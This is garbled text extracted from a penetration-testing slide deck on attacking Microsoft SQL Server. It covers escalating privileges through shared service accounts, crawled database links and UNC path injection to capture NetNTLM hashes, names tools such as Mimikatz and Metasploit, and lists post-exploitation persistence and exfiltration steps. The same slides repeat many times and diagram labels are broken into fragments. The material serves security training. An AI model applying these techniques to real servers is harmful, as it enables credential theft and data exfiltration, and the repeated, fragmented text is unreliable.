Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
